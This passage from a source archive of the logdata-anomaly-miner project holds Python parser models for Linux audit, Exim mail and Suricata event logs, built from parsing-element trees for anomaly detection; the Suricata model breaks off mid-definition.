ogid="), VariableByteDataModelElement("ogid", alphabet), FixedDataModelElement("rdev_str", b" rdev="), VariableByteDataModelElement("rdev", alphabet), FixedDataModelElement("nametype_str", b" nametype="), VariableByteDataModelElement("nametype", alphabet)])])]), SequenceModelElement("login", [ 
FixedDataModelElement("msg1_str", b"LOGIN msg=audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("pid_str", b"): pid="), VariableByteDataModelElement("pid", alphabet), FixedDataModelElement("uid_str", b" uid="), VariableByteDataModelElement("uid", alphabet), FixedDataModelElement("old_auid_str", b" old-auid="), VariableByteDataModelElement("old_auid", alphabet), FixedDataModelElement("auid_str", b" auid="), VariableByteDataModelElement("auid", alphabet), OptionalMatchModelElement( "tty", SequenceModelElement("tty", [ FixedDataModelElement("tty_str", b" tty="), VariableByteDataModelElement("tty", alphabet)])), FixedDataModelElement("old_ses_str", b" old-ses="), VariableByteDataModelElement("old_ses", alphabet), FixedDataModelElement("ses_str", b" ses="), VariableByteDataModelElement("ses", alphabet), FixedDataModelElement("res_str", b" res="), VariableByteDataModelElement("res", alphabet)]), SequenceModelElement("sockaddr", [ FixedDataModelElement("msg_str", b"SOCKADDR msg=audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("saddr_str", b"): saddr="), VariableByteDataModelElement("saddr", alphabet)]), SequenceModelElement("unknown", [ FixedDataModelElement("unknwon_str", b"UNKNOWN["), DecimalIntegerValueModelElement("unknown_id", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("msg_str", b"] msg=audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("proctitle_str", b"): proctitle="), VariableByteDataModelElement("proctitle", alphabet)]), SequenceModelElement("cred_refr", [ FixedDataModelElement("msg1_str", b"CRED_REFR msg=")] + seq), SequenceModelElement("user_start", [ FixedDataModelElement("msg1_str", b"USER_START msg=")] + 
seq), SequenceModelElement("user_acct", [ FixedDataModelElement("msg1_str", b"USER_ACCT msg=")] + seq), SequenceModelElement("user_auth", [ FixedDataModelElement("msg1_str", b"USER_AUTH msg=")] + seq), SequenceModelElement("user_login", [ FixedDataModelElement("msg1_str", b"USER_LOGIN msg=")] + seq), SequenceModelElement("cred_disp", [ FixedDataModelElement("msg1_str", b"CRED_DISP msg=")] + seq), SequenceModelElement("service_start", [ FixedDataModelElement("msg1_str", b"SERVICE_START msg=")] + seq), SequenceModelElement("service_stop", [ FixedDataModelElement("msg1_str", b"SERVICE_STOP msg=")] + seq), SequenceModelElement("user_end", [ FixedDataModelElement("msg1_str", b"USER_END msg=")] + seq), SequenceModelElement("user_cmd", [ FixedDataModelElement("msg1_str", b"USER_CMD msg=")] + seq), SequenceModelElement("cred_acq", [ FixedDataModelElement("msg1_str", b"CRED_ACQ msg=")] + seq), SequenceModelElement("avc", [ FixedDataModelElement("abc_str", b"AVC msg=audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("apparmor_str", b"): apparmor=\""), DelimitedDataModelElement("apparmor", b"\""), FixedDataModelElement("operation_str", b"\" operation=\""), DelimitedDataModelElement("operation", b"\""), OptionalMatchModelElement( "opt", SequenceModelElement("seq", [ FixedDataModelElement("info_str", b"\" info=\""), DelimitedDataModelElement("info", b"\"")])), FixedDataModelElement("profile_str", b"\" profile=\""), DelimitedDataModelElement("profile", b"\""), FixedDataModelElement("name_str", b"\" name=\""), DelimitedDataModelElement("name", b"\""), FixedDataModelElement("pid_str", b"\" pid="), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("comm_str", b" comm=\""), DelimitedDataModelElement("comm", b"\""), FixedDataModelElement("quote", b"\"")]), SequenceModelElement("user_bprm_fcaps", [ FixedDataModelElement("msg1_str", b"BPRM_FCAPS msg=audit("), 
DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("fver_str", b"): fver="), VariableByteDataModelElement("fver", alphabet), FixedDataModelElement("fp_str", b" fp="), VariableByteDataModelElement("fp", alphabet), FixedDataModelElement("fi_str", b" fi="), VariableByteDataModelElement("fi", alphabet), FixedDataModelElement("fe_str", b" fe="), VariableByteDataModelElement("fe", alphabet), FixedDataModelElement("old_pp_str", b" old_pp="), VariableByteDataModelElement("old_pp", alphabet), FixedDataModelElement("old_pi_str", b" old_pi="), VariableByteDataModelElement("old_pi", alphabet), FixedDataModelElement("old_pe_str", b" old_pe="), VariableByteDataModelElement("old_pe", alphabet), FixedDataModelElement("new_pp_str", b" new_pp="), VariableByteDataModelElement("new_pp", alphabet), FixedDataModelElement("new_pi_str", b" new_pi="), VariableByteDataModelElement("new_pi", alphabet), FixedDataModelElement("new_pe_str", b" new_pe="), VariableByteDataModelElement("new_pe", alphabet)])])]) return model logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/ait-lds/EximParsingModel.py000066400000000000000000000227561500476301700322130ustar00rootroot00000000000000"""This module defines a parser model for exim.""" from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import 
SequenceModelElement
from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement


def get_model():
    """
    Build the parser model for Exim main-log lines of the AIT-LDS.

    Every line starts with a ``%Y-%m-%d %H:%M:%S`` timestamp and one space; the rest of
    the line is handed to the top-level FirstMatchModelElement ``fm``, whose branches
    cover queue-run start/end, TLS errors, reverse-DNS failures, daemon start, VRFY
    failures, a locked spool file and the per-message records (``<=``, ``=>``, ``**``,
    ``PRDR``, ``->``, ``Completed`` and the two frozen variants).

    @return the root SequenceModelElement named ``model``.
    """
    # Byte alphabet accepted by the free-form T= field of a delivery ("=>") record.
    alphabet = b"!'#$%&\"()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[]"

    # NOTE(review): several sibling elements reuse one id ("start" and "end" twice in fm,
    # "sp1" twice in seq1/h, "sp2" twice in seq1, "frozen" twice in dir). All ids are kept
    # verbatim below so the model is unchanged; if match paths are keyed by element id,
    # those siblings share a path and cannot be told apart downstream - confirm before
    # relying on them in a detector.

    # --- top-level, non-message branches, in their original order ---
    queue_run_start = SequenceModelElement("start", [
        FixedDataModelElement("start", b"Start queue run: pid="),
        DecimalIntegerValueModelElement("pid"),
    ])
    tls_error = SequenceModelElement("start", [
        FixedDataModelElement("start", b"TLS error"),
        AnyByteDataModelElement("remainder"),
    ])
    queue_run_end = SequenceModelElement("end", [
        FixedDataModelElement("end", b"End queue run: pid="),
        DecimalIntegerValueModelElement("pid"),
    ])
    no_host_found = SequenceModelElement("no_host_found", [
        FixedDataModelElement("no_host_found_str", b"no host name found for IP address "),
        IpAddressDataModelElement("ip"),
    ])
    daemon_started = SequenceModelElement("start_daemon", [
        FixedDataModelElement("start_daemon_str", b"exim "),
        DelimitedDataModelElement("version", b" "),
        # "deamon" spelling kept verbatim so the ids stay identical to the original model.
        FixedDataModelElement("start_deamon_str2", b" daemon started"),
        AnyByteDataModelElement("msg"),
    ])
    vrfy_failed = SequenceModelElement("vrfy_failed", [
        FixedDataModelElement("vrfy_failed_str", b"VRFY failed for "),
        DelimitedDataModelElement("mail", b" "),
        FixedDataModelElement("h_str", b" H="),
        DelimitedDataModelElement("h", b" "),
        FixedDataModelElement("sp1", b" ["),
        IpAddressDataModelElement("ip"),
        FixedDataModelElement("sp2", b"]"),
    ])
    spool_locked = SequenceModelElement("end", [
        DelimitedDataModelElement("spool", b" "),
        FixedDataModelElement("spool_file_locked", b" Spool file is locked (another process is handling this message)"),
    ])

    # --- "<= " (inbound) records: empty sender "<> " or a sender address, then attributes ---
    bounce_in = SequenceModelElement("seq1", [
        FixedDataModelElement("brack", b"<> "),
        FirstMatchModelElement("fm", [
            SequenceModelElement("r", [
                FixedDataModelElement("r_str", b"R="),
                DelimitedDataModelElement("r", b" "),
                FixedDataModelElement("u_str", b" U="),
                DelimitedDataModelElement("u", b" "),
            ]),
            SequenceModelElement("h", [
                FixedDataModelElement("h_str", b"H="),
                DelimitedDataModelElement("h", b" "),
                FixedDataModelElement("sp1", b" ["),
                IpAddressDataModelElement("ip"),
                FixedDataModelElement("sp1", b"]"),
            ]),
        ]),
        FixedDataModelElement("sp2", b" P="),
        DelimitedDataModelElement("p", b" "),
        FixedDataModelElement("sp2", b" S="),
        DecimalIntegerValueModelElement("s"),
    ])
    sender_in = SequenceModelElement("seq2", [
        DelimitedDataModelElement("mail", b" "),
        FixedDataModelElement("user_str", b" U="),
        DelimitedDataModelElement("user", b" "),
        FixedDataModelElement("p_str", b" P="),
        DelimitedDataModelElement("p", b" "),
        FixedDataModelElement("s_str", b" S="),
        DecimalIntegerValueModelElement("s"),
        OptionalMatchModelElement("id", SequenceModelElement("id", [
            FixedDataModelElement("id_str", b" id="),
            AnyByteDataModelElement("id"),
        ])),
    ])
    inbound = SequenceModelElement("dir_in", [
        FixedDataModelElement("in", b" <= "),
        FirstMatchModelElement("fm", [
            bounce_in,
            sender_in,
            # anything that is neither form is kept as an opaque remainder
            AnyByteDataModelElement("remainder"),
        ]),
    ])

    # --- "=> " (outbound) records: optional "(...)" and "<...>" parts, R=, T= and
    #     an optional H=/X=/CV=/DN=/C= tail ---
    delivery_params = OptionalMatchModelElement("param_opt", SequenceModelElement("seq", [
        FixedDataModelElement("h_str", b" H="),
        DelimitedDataModelElement("h", b" X="),
        FixedDataModelElement("x_str", b" X="),
        DelimitedDataModelElement("x", b" CV="),
        FixedDataModelElement("cv_str", b" CV="),
        DelimitedDataModelElement("cv", b" DN="),
        FixedDataModelElement("dn_str", b" DN="),
        DelimitedDataModelElement("dn", b" C="),
        AnyByteDataModelElement("c"),
    ]))
    outbound = SequenceModelElement("dir_out", [
        FixedDataModelElement("in", b" => "),
        DelimitedDataModelElement("name", b" "),
        FirstMatchModelElement("fm", [
            SequenceModelElement("seq", [
                FixedDataModelElement("sp1", b" "),
                OptionalMatchModelElement("mail_opt", SequenceModelElement("mail", [
                    FixedDataModelElement("brack1", b"("),
                    DelimitedDataModelElement("brack_mail", b")"),
                    FixedDataModelElement("brack2", b") "),
                ])),
                OptionalMatchModelElement("opt", SequenceModelElement("seq", [
                    FixedDataModelElement("sp2", b"<"),
                    DelimitedDataModelElement("mail", b">"),
                    FixedDataModelElement("closing_brack", b"> "),
                ])),
                FixedDataModelElement("r_str", b"R="),
                DelimitedDataModelElement("r", b" "),
                FixedDataModelElement("t_str", b" T="),
                VariableByteDataModelElement("t", alphabet),
                delivery_params,
            ]),
        ]),
    ])

    # --- per-message record: message id followed by one of the direction/status forms ---
    message_record = SequenceModelElement("mail", [
        DelimitedDataModelElement("id", b" "),
        FirstMatchModelElement("dir", [
            inbound,
            outbound,
            SequenceModelElement("aster", [
                FixedDataModelElement("aster", b" ** "),
                DelimitedDataModelElement("command", b" "),
                FixedDataModelElement("headers_str", b' Too many "Received" headers - suspected mail loop'),
            ]),
            SequenceModelElement("prdr", [
                FixedDataModelElement("prdr", b" PRDR "),
                AnyByteDataModelElement("remainder"),
            ]),
            SequenceModelElement("arrw", [
                FixedDataModelElement("arrw", b" -> "),
                AnyByteDataModelElement("remainder"),
            ]),
            FixedDataModelElement("completed", b" Completed"),
            FixedDataModelElement("frozen", b" Message is frozen"),
            FixedDataModelElement("frozen", b" Frozen (delivery error message)"),
        ]),
    ])

    # Children of a FirstMatchModelElement are, per its name, tried in order, so the
    # original branch order is preserved exactly.
    model = SequenceModelElement("model", [
        DateTimeModelElement("time", b"%Y-%m-%d %H:%M:%S"),
        FixedDataModelElement("sp", b" "),
        FirstMatchModelElement("fm", [
            queue_run_start,
            tls_error,
            queue_run_end,
            no_host_found,
            daemon_started,
            vrfy_failed,
            spool_locked,
            message_record,
        ]),
    ])
    return model
SuricataEventParsingModel.py000066400000000000000000001031421500476301700337740ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/ait-lds"""This module defines a generated parser model."""
from aminer.parsing.DateTimeModelElement import DateTimeModelElement
from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement
from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement
from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement
from aminer.parsing.FixedDataModelElement import FixedDataModelElement
from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement
from aminer.parsing.HexStringModelElement import HexStringModelElement
from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement
from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement
from aminer.parsing.SequenceModelElement import 
SequenceModelElement def get_model(): """Return a model to parse Suricata Event logs from the AIT-LDS.""" conn = SequenceModelElement("conn", [ FixedDataModelElement("src_ip_str", b'"src_ip":"'), FirstMatchModelElement("ip", [ SequenceModelElement("ipv4", [ IpAddressDataModelElement("src_ip"), FixedDataModelElement("src_port_str", b'","src_port":'), DecimalIntegerValueModelElement("src_port"), FixedDataModelElement("dest_ip_str", b',"dest_ip":"'), IpAddressDataModelElement("dest_ip"), FixedDataModelElement("dest_port_str", b'","dest_port":'), DecimalIntegerValueModelElement("dest_port"), FixedDataModelElement("proto_str", b',"proto":"'), DelimitedDataModelElement("proto", b'"'), FixedDataModelElement("quote", b'"') ]), SequenceModelElement("ipv6", [ DelimitedDataModelElement("src_ip", b'"'), FixedDataModelElement("dest_ip_str", b'","dest_ip":"'), DelimitedDataModelElement("dest_ip", b'"'), FixedDataModelElement("proto_str", b'","proto":"'), DelimitedDataModelElement("proto", b'"'), FixedDataModelElement("icmp_type_str", b'","icmp_type":'), DecimalIntegerValueModelElement("icmp_type"), FixedDataModelElement("icmp_code_str", b',"icmp_code":'), DecimalIntegerValueModelElement("icmp_code"), ]), ]) ]) http = SequenceModelElement("http", [ FixedDataModelElement("hostname_str", b',"http":{"hostname":"'), DelimitedDataModelElement("hostname", b'"'), FixedDataModelElement("url_str", b'","url":"'), DelimitedDataModelElement("url", b'"', escape=b"\\"), FixedDataModelElement("http_user_agent_str", b'","http_user_agent":"'), DelimitedDataModelElement("http_user_agent", b'"'), OptionalMatchModelElement( "content_type", SequenceModelElement("content_type", [ FixedDataModelElement("http_content_type_str", b'","http_content_type":"'), DelimitedDataModelElement("http_content_type", b'"'), ])), OptionalMatchModelElement( "http_refer", SequenceModelElement("http_refer", [ FixedDataModelElement("http_refer_str", b'","http_refer":"'), DelimitedDataModelElement("http_refer", b'"'), ])), 
FixedDataModelElement("http_method_str", b'","http_method":"'), DelimitedDataModelElement("http_method", b'"'), FixedDataModelElement("protocol_str", b'","protocol":"'), DelimitedDataModelElement("protocol", b'"'), FixedDataModelElement("quote_str", b'"'), OptionalMatchModelElement( "status", SequenceModelElement("status", [ FixedDataModelElement("status_str", b',"status":'), DecimalIntegerValueModelElement("status"), ])), OptionalMatchModelElement( "redirect", SequenceModelElement("redirect", [ FixedDataModelElement("redirect_str", b',"redirect":"'), DelimitedDataModelElement("redirect", b'"'), FixedDataModelElement("quote_str", b'"') ])), FixedDataModelElement("length_str", b',"length":'), DecimalIntegerValueModelElement("length"), FixedDataModelElement("brack_str", b"}") ]) model = SequenceModelElement("model", [ FixedDataModelElement("time_str", b'{"timestamp":"'), DateTimeModelElement("time", b"%Y-%m-%dT%H:%M:%S.%f%z"), FixedDataModelElement("comma_str", b'",'), OptionalMatchModelElement( "flow_id", SequenceModelElement("flow_id", [ FixedDataModelElement("flow_id_str", b'"flow_id":'), DecimalIntegerValueModelElement("flow_id"), FixedDataModelElement("comma_str", b",")])), OptionalMatchModelElement( "in_iface", SequenceModelElement("in_iface", [ FixedDataModelElement("in_iface_str", b'"in_iface":"'), DelimitedDataModelElement("in_iface", b'"'), FixedDataModelElement("comma_str", b'",')])), FixedDataModelElement("event_type_str", b'"event_type":"'), FirstMatchModelElement("event_type", [ SequenceModelElement("dns", [ FixedDataModelElement("dns_str", b'dns",'), conn, SequenceModelElement("dns", [ FixedDataModelElement("type_str", b',"dns":{"type":"'), DelimitedDataModelElement("type", b'"'), FixedDataModelElement("id_str", b'","id":'), DecimalIntegerValueModelElement("id"), OptionalMatchModelElement( "rcode", SequenceModelElement("rcode", [ FixedDataModelElement("rcode_str", b',"rcode":"'), DelimitedDataModelElement("rcode", b'"'), 
FixedDataModelElement("quote_str", b'"')])), FixedDataModelElement("rrname_str", b',"rrname":"'), DelimitedDataModelElement("rrname", b'"'), OptionalMatchModelElement("rrtype", SequenceModelElement("rrtype", [ FixedDataModelElement("rrtype_str", b'","rrtype":"'), DelimitedDataModelElement("rrtype", b'"')])), FixedDataModelElement("quote", b'"'), OptionalMatchModelElement( "tx_id", SequenceModelElement("tx_id", [ FixedDataModelElement("tx_id_str", b',"tx_id":'), DecimalIntegerValueModelElement("tx_id")])), OptionalMatchModelElement("ttl", SequenceModelElement("ttl", [ FixedDataModelElement("ttl_str", b',"ttl":'), DecimalIntegerValueModelElement("ttl")])), OptionalMatchModelElement( "rdata", SequenceModelElement("rdata", [ FixedDataModelElement("rdata_str", b',"rdata":"'), DelimitedDataModelElement("rdata", b'"'), FixedDataModelElement("quote_str", b'"')])), FixedDataModelElement("brack_str", b"}}") ]), ]), SequenceModelElement("flow", [ FixedDataModelElement("flow_str", b'flow",'), conn, OptionalMatchModelElement( "app_proto", SequenceModelElement("app_proto", [ FixedDataModelElement("app_proto_str", b',"app_proto":"'), DelimitedDataModelElement("app_proto", b'"'), FixedDataModelElement("quote_str", b'"') ]) ), OptionalMatchModelElement( "app_proto_tc", SequenceModelElement("app_proto_tc", [ FixedDataModelElement("app_proto_tc_str", b',"app_proto_tc":"'), DelimitedDataModelElement("app_proto_tc", b'"'), FixedDataModelElement("quote_str", b'"') ]) ), SequenceModelElement("flow", [ FixedDataModelElement("pkts_toserver_str", b',"flow":{"pkts_toserver":'), DecimalIntegerValueModelElement("pkts_toserver"), FixedDataModelElement("pkts_toclient_str", b',"pkts_toclient":'), DecimalIntegerValueModelElement("pkts_toclient"), FixedDataModelElement("bytes_toserver_str", b',"bytes_toserver":'), DecimalIntegerValueModelElement("bytes_toserver"), FixedDataModelElement("bytes_toclient_str", b',"bytes_toclient":'), DecimalIntegerValueModelElement("bytes_toclient"), 
FixedDataModelElement("start_str", b',"start":"'), DelimitedDataModelElement("start", b'"'), FixedDataModelElement("end_str", b'","end":"'), DelimitedDataModelElement("end", b'"'), FixedDataModelElement("age_str", b'","age":'), DecimalIntegerValueModelElement("age"), FixedDataModelElement("state_str", b',"state":"'), DelimitedDataModelElement("state", b'"'), FixedDataModelElement("reason_str", b'","reason":"'), DelimitedDataModelElement("reason", b'"'), FixedDataModelElement("alerted_str", b'","alerted":'), FixedWordlistDataModelElement("alerted", [b"true", b"false"]), FixedDataModelElement("brack_str1", b"}"), OptionalMatchModelElement( "tcp", SequenceModelElement("tcp", [ FixedDataModelElement("tcp_flags_str", b',"tcp":{"tcp_flags":"'), HexStringModelElement("tcp_flags"), FixedDataModelElement("tcp_flags_ts_str", b'","tcp_flags_ts":"'), HexStringModelElement("tcp_flags_ts"), FixedDataModelElement("tcp_flags_tc_str", b'","tcp_flags_tc":"'), HexStringModelElement("tcp_flags_tc"), OptionalMatchModelElement( "flags", SequenceModelElement("flags", [ FixedDataModelElement("syn_str", b'","syn":'), FixedWordlistDataModelElement("syn", [b"true", b"false"]), OptionalMatchModelElement( "fin", SequenceModelElement("fin", [ FixedDataModelElement("fin_str", b',"fin":'), FixedWordlistDataModelElement("fin", [b"true", b"false"]), ]) ), OptionalMatchModelElement( "rst", SequenceModelElement("rst", [ FixedDataModelElement("rst_str", b',"rst":'), FixedWordlistDataModelElement("rst", [b"true", b"false"]), ]) ), OptionalMatchModelElement( "psh", SequenceModelElement("psh", [ FixedDataModelElement("psh_str", b',"psh":'), FixedWordlistDataModelElement("psh", [b"true", b"false"]), ]) ), FixedDataModelElement("ack_str", b',"ack":'), FixedWordlistDataModelElement("ack", [b"true", b"false"]), FixedDataModelElement("tcp_state_str", b',"state":"'), DelimitedDataModelElement("tcp_state", b'"'), ]) ), FixedDataModelElement("tcp_brack_str", b'"}'), ]) ), FixedDataModelElement("brack_str2", 
b"}") ]), ]), SequenceModelElement("http", [ FixedDataModelElement("http_str", b'http",'), conn, FixedDataModelElement("tx_id_str", b',"tx_id":'), DecimalIntegerValueModelElement("tx_id"), http, FixedDataModelElement("brack_str", b"}") ]), SequenceModelElement("fileinfo", [ FixedDataModelElement("fileinfo_str", b'fileinfo",'), conn, http, FixedDataModelElement("app_proto_str", b',"app_proto":"'), DelimitedDataModelElement("app_proto", b'"'), SequenceModelElement("fileinfo", [ FixedDataModelElement("fileinfo_str", b'","fileinfo":{'), OptionalMatchModelElement( "filename", SequenceModelElement("filename", [ FixedDataModelElement("filename_str", b'"filename":"'), DelimitedDataModelElement("filename", b'"'), FixedDataModelElement("quote_str", b'",') ]) ), FixedDataModelElement("state_str", b'"state":"'), DelimitedDataModelElement("state", b'"'), FixedDataModelElement("stored_str", b'","stored":'), FixedWordlistDataModelElement("stored", [b"true", b"false"]), FixedDataModelElement("size_str", b',"size":'), DecimalIntegerValueModelElement("size"), FixedDataModelElement("tx_id_str", b',"tx_id":'), DecimalIntegerValueModelElement("tx_id"), FixedDataModelElement("brack_str", b"}}") ]), ]), SequenceModelElement("stats", [ FixedDataModelElement("stats_str", b'stats",'), FixedDataModelElement("uptime_str", b'"stats":{"uptime":'), DecimalIntegerValueModelElement("uptime"), SequenceModelElement("capture", [ FixedDataModelElement("capture_str", b',"capture":{'), FixedDataModelElement("kernel_packets_str", b'"kernel_packets":'), DecimalIntegerValueModelElement("kernel_packets"), FixedDataModelElement("kernel_drops_str", b',"kernel_drops":'), DecimalIntegerValueModelElement("kernel_drops"), FixedDataModelElement("brack_str", b"}") ]), SequenceModelElement("decoder", [ FixedDataModelElement("pkts_str", b',"decoder":{"pkts":'), DecimalIntegerValueModelElement("pkts"), FixedDataModelElement("bytes_str", b',"bytes":'), DecimalIntegerValueModelElement("bytes"), 
FixedDataModelElement("invalid_str", b',"invalid":'), DecimalIntegerValueModelElement("invalid"), FixedDataModelElement("ipv4_str", b',"ipv4":'), DecimalIntegerValueModelElement("ipv4"), FixedDataModelElement("ipv6_str", b',"ipv6":'), DecimalIntegerValueModelElement("ipv6"), FixedDataModelElement("ethernet_str", b',"ethernet":'), DecimalIntegerValueModelElement("ethernet"), FixedDataModelElement("raw_str", b',"raw":'), DecimalIntegerValueModelElement("raw"), FixedDataModelElement("null_str", b',"null":'), DecimalIntegerValueModelElement("null"), FixedDataModelElement("sll_str", b',"sll":'), DecimalIntegerValueModelElement("sll"), FixedDataModelElement("tcp_str", b',"tcp":'), DecimalIntegerValueModelElement("tcp"), FixedDataModelElement("udp_str", b',"udp":'), DecimalIntegerValueModelElement("udp"), FixedDataModelElement("sctp_str", b',"sctp":'), DecimalIntegerValueModelElement("sctp"), FixedDataModelElement("icmpv4_str", b',"icmpv4":'), DecimalIntegerValueModelElement("icmpv4"), FixedDataModelElement("icmpv6_str", b',"icmpv6":'), DecimalIntegerValueModelElement("icmpv6"), FixedDataModelElement("ppp_str", b',"ppp":'), DecimalIntegerValueModelElement("ppp"), FixedDataModelElement("pppoe_str", b',"pppoe":'), DecimalIntegerValueModelElement("pppoe"), FixedDataModelElement("gre_str", b',"gre":'), DecimalIntegerValueModelElement("gre"), FixedDataModelElement("vlan_str", b',"vlan":'), DecimalIntegerValueModelElement("vlan"), FixedDataModelElement("vlan_qinq_str", b',"vlan_qinq":'), DecimalIntegerValueModelElement("vlan_qinq"), FixedDataModelElement("teredo_str", b',"teredo":'), DecimalIntegerValueModelElement("teredo"), FixedDataModelElement("ipv4_in_ipv6_str", b',"ipv4_in_ipv6":'), DecimalIntegerValueModelElement("ipv4_in_ipv6"), FixedDataModelElement("ipv6_in_ipv6_str", b',"ipv6_in_ipv6":'), DecimalIntegerValueModelElement("ipv6_in_ipv6"), FixedDataModelElement("mpls_str", b',"mpls":'), DecimalIntegerValueModelElement("mpls"), FixedDataModelElement("avg_pkt_size_str", 
b',"avg_pkt_size":'), DecimalIntegerValueModelElement("avg_pkt_size"), FixedDataModelElement("max_pkt_size_str", b',"max_pkt_size":'), DecimalIntegerValueModelElement("max_pkt_size"), FixedDataModelElement("erspan_str", b',"erspan":'), DecimalIntegerValueModelElement("erspan"), SequenceModelElement("ipraw", [ FixedDataModelElement("invalid_ip_version_str", b',"ipraw":{"invalid_ip_version":'), DecimalIntegerValueModelElement("invalid_ip_version"), ]), SequenceModelElement("ltnull", [ FixedDataModelElement("ipraw_pkt_too_small_str", b'},"ltnull":{"pkt_too_small":'), DecimalIntegerValueModelElement("ipraw_pkt_too_small"), FixedDataModelElement("unsupported_type", b',"unsupported_type":'), DecimalIntegerValueModelElement("unsupported_type"), ]), SequenceModelElement("dce", [ FixedDataModelElement("dce_pkt_too_small_str", b'},"dce":{"pkt_too_small":'), DecimalIntegerValueModelElement("dce_pkt_too_small"), FixedDataModelElement("brack_str", b"}") ]) ]), SequenceModelElement("flow", [ FixedDataModelElement("memcap_str", b'},"flow":{"memcap":'), DecimalIntegerValueModelElement("memcap"), FixedDataModelElement("spare_str", b',"spare":'), DecimalIntegerValueModelElement("spare"), FixedDataModelElement("emerg_mode_entered_str", b',"emerg_mode_entered":'), DecimalIntegerValueModelElement("emerg_mode_entered"), FixedDataModelElement("emerg_mode_over_str", b',"emerg_mode_over":'), DecimalIntegerValueModelElement("emerg_mode_over"), FixedDataModelElement("tcp_reuse_str", b',"tcp_reuse":'), DecimalIntegerValueModelElement("tcp_reuse"), FixedDataModelElement("memuse_str", b',"memuse":'), DecimalIntegerValueModelElement("memuse"), ]), SequenceModelElement("defrag", [ SequenceModelElement("ipv4", [ FixedDataModelElement("fragments_str", b'},"defrag":{"ipv4":{"fragments":'), DecimalIntegerValueModelElement("fragments"), FixedDataModelElement("reassembled_str", b',"reassembled":'), DecimalIntegerValueModelElement("reassembled_str"), FixedDataModelElement("timeouts_str", 
b',"timeouts":'), DecimalIntegerValueModelElement("timeouts"), ]), SequenceModelElement("ipv6", [ FixedDataModelElement("fragments_str", b'},"ipv6":{"fragments":'), DecimalIntegerValueModelElement("fragments"), FixedDataModelElement("reassembled_str", b',"reassembled":'), DecimalIntegerValueModelElement("reassembled_str"), FixedDataModelElement("timeouts_str", b',"timeouts":'), DecimalIntegerValueModelElement("timeouts"), ]), FixedDataModelElement("max_frag_hits_str", b'},"max_frag_hits":'), DecimalIntegerValueModelElement("max_frag_hits"), ]), SequenceModelElement("tcp", [ FixedDataModelElement("sessions_str", b'},"tcp":{"sessions":'), DecimalIntegerValueModelElement("sessions"), FixedDataModelElement("ssn_memcap_drop_str", b',"ssn_memcap_drop":'), DecimalIntegerValueModelElement("ssn_memcap_drop"), FixedDataModelElement("pseudo_str", b',"pseudo":'), DecimalIntegerValueModelElement("pseudo"), FixedDataModelElement("pseudo_failed_str", b',"pseudo_failed":'), DecimalIntegerValueModelElement("pseudo_failed"), FixedDataModelElement("invalid_checksum_str", b',"invalid_checksum":'), DecimalIntegerValueModelElement("invalid_checksum"), FixedDataModelElement("no_flow_str", b',"no_flow":'), DecimalIntegerValueModelElement("no_flow"), FixedDataModelElement("syn_str", b',"syn":'), DecimalIntegerValueModelElement("syn"), FixedDataModelElement("synack_str", b',"synack":'), DecimalIntegerValueModelElement("synack"), FixedDataModelElement("rst_str", b',"rst":'), DecimalIntegerValueModelElement("rst"), FixedDataModelElement("segment_memcap_drop_str", b',"segment_memcap_drop":'), DecimalIntegerValueModelElement("segment_memcap_drop"), FixedDataModelElement("stream_depth_reached_str", b',"stream_depth_reached":'), DecimalIntegerValueModelElement("stream_depth_reached"), FixedDataModelElement("reassembly_gap_str", b',"reassembly_gap":'), DecimalIntegerValueModelElement("reassembly_gap"), FixedDataModelElement("memuse_str", b',"memuse":'), DecimalIntegerValueModelElement("memuse"), 
FixedDataModelElement("reassembly_memuse_str", b',"reassembly_memuse":'), DecimalIntegerValueModelElement("reassembly_memuse"), ]), SequenceModelElement("detect", [ FixedDataModelElement("alert_str", b'},"detect":{"alert":'), DecimalIntegerValueModelElement("alert") ]), SequenceModelElement("app_layer", [ SequenceModelElement("flow", [ FixedDataModelElement("http_str", b'},"app_layer":{"flow":{"http":'), DecimalIntegerValueModelElement("http"), FixedDataModelElement("ftp_str", b',"ftp":'), DecimalIntegerValueModelElement("ftp"), FixedDataModelElement("smtp_str", b',"smtp":'), DecimalIntegerValueModelElement("smtp"), FixedDataModelElement("tls_str", b',"tls":'), DecimalIntegerValueModelElement("tls"), FixedDataModelElement("ssh_str", b',"ssh":'), DecimalIntegerValueModelElement("ssh"), FixedDataModelElement("imap_str", b',"imap":'), DecimalIntegerValueModelElement("imap"), FixedDataModelElement("msn_str", b',"msn":'), DecimalIntegerValueModelElement("msn"), FixedDataModelElement("smb_str", b',"smb":'), DecimalIntegerValueModelElement("smb"), FixedDataModelElement("dcerpc_tcp_str", b',"dcerpc_tcp":'), 